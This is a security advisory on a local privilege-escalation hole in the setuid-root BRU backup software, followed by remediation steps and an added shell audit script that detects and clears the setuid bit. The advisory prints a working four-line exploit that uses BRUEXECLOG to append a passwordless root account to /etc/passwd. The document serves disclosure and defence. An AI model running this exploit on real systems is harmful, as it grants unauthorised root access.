
Bru backup software logfile exploit



    Those using bru


    Riley Hassell found a vulnerability in BRU during his 'Security
    Contest' for his company.  BRU is backup software.

    You can change the log file BRU uses by setting the BRUEXECLOG
    environment variable.  Since bru is installed setuid root, this lets
    any local user append to any file on the system.


        $ BRUEXECLOG=/etc/passwd
        $ export BRUEXECLOG
        $ bru -V '
        > comsec::0:0::/:/bin/sh
        > '
        $ su comsec


    By default, BRU is installed setuid root.  If it isn't, and it is
    run by a non-root user, it complains:

        bru: [W171] warning - BRU must be owned by root and have suid bit set

    Many (most) users who install BRU probably never think to check
    whether it is installed setuid.  Should it be?  Probably not, but it
    is a very real vulnerability under a default install.

    Solution for Caldera OpenLinux:

        - If you do not need BRU, issue as root: rpm -e BRU
        - Otherwise remove the suid-root bit by issuing as root: chmod u-s /bru/bru /bin/bru
        - If you want to use BRU as a normal user, you have to point
          the 'BRUEXECLOG' environment variable to a file writeable by
          the user, like

            BRUEXECLOG=~/.brulog; export BRUEXECLOG    (sh/ksh/bash)

            setenv BRUEXECLOG ~/.brulog                (csh/tcsh)
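    The following audit helper is an added example and is not part of
    the original advisory or of BRU itself.  It checks whether the two
    BRU binaries the advisory names (/bru/bru and /bin/bru) still carry
    the setuid bit and are owned by root, and with --fix it performs the
    advisory's second remediation step (chmod u-s).  Any other paths
    passed as arguments are checked the same way.

```shell
#!/bin/sh
# Added audit helper (not from the advisory, not BRU code). Candidate paths
# default to the ones named in the advisory; extra paths may be given.

# has_setuid_bit FILE: exit 0 if FILE is a regular file with the setuid bit set.
has_setuid_bit() {
    [ -f "$1" ] && [ -u "$1" ]
}

# owned_by_root FILE: exit 0 if FILE is owned by root (POSIX find, no stat(1),
# so it works the same on old SysV/Linux/BSD userlands).
owned_by_root() {
    [ -n "$(find "$1" -prune -user root -print 2>/dev/null)" ]
}

# audit_bru [--fix] [PATH...]: report each candidate binary. With --fix, clear
# the setuid bit (must be run as root). Returns 0 when no setuid-root BRU
# binary remains on the system, 1 otherwise.
audit_bru() {
    fix=0
    if [ "$1" = "--fix" ]; then fix=1; shift; fi
    [ $# -gt 0 ] || set -- /bru/bru /bin/bru   # defaults taken from the advisory
    bad=0
    for f in "$@"; do
        if ! [ -f "$f" ]; then
            echo "not installed: $f"
            continue
        fi
        if has_setuid_bit "$f" && owned_by_root "$f"; then
            if [ $fix -eq 1 ] && chmod u-s "$f"; then
                echo "fixed: cleared setuid bit on $f"
                continue
            fi
            echo "VULNERABLE: $f is setuid root (BRUEXECLOG can append to any file)"
            bad=1
        else
            echo "ok: $f is not setuid root"
        fi
    done
    return $bad
}

# Usage: sh bru_audit.sh            - report only
#        sh bru_audit.sh --fix      - report and remove the setuid bit (as root)
[ "${BRU_AUDIT_NO_MAIN:-0}" = 1 ] || audit_bru "$@"
```

    Running the helper from cron after package updates catches the case
    where a reinstall or upgrade of the BRU package silently restores the
    setuid bit.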
